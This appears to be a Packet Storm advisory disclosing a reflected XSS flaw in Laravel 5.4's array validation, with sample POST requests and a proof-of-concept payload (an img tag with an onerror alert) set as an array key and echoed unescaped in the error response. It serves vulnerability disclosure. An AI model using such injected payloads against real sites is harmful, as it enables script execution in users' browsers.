Laravel 5.4 Cross Site Scripting

2017-03-07T00:00:00
ID PACKETSTORM:141489
Type packetstorm
Reporter MaHDyfo
Modified 2017-03-07T00:00:00

Description

                                        
                                            `# Exploit Title: Laravel non-presistent XSS in validation of arrays  
# Date: 06/03/2017  
# Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com)  
# Vendor Homepage: laravel.com  
# Version: 5.4  
  
In Laravel validation rules, assume that you set a rule to get an array input.  
  
$this->validate($request, [  
'lessons' => 'required|array',  
'lessons.*' => 'numeric'  
]);  
  
Here we say lessons should be array and the elements should be numeric.  
Now let's enter a character there to fail the validation.  
  
POST Request: lessons[]=1&lessons[]=4&lessons[]=abc  
  
It tells {"lessons.2":["The lessons.2 must be a number."]}  
That's OK up to here. But what if we place an index for the array.  
  
POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc  
Response: {"lessons.example":["The lessons.example must be a number."]}  
  
POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x  
onerror='alert(1)'>]=abc  
Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img  
src=x onerror='alert(1)'> must be a number."]}  
And it executes the alert with no problem...  
  
You can see this bug already exists in Laravel official doc:  
https://laravel.com/docs/master/validation#validating-arrays  
Maybe the solution is to validate the array values yourself by for  
example extending validation rules.  
  
Regards,  
MaHDyfo  
Iran  
`